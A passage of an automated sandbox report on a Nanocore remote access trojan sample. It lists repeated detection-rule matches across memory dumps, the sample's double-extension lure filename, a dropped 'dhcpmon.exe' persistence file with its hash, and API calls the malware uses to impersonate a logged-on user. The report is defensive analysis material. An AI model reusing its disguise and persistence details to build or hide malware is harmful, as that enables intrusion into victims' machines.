      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: initial sampleStatic PE information: Filename: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00371A91
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
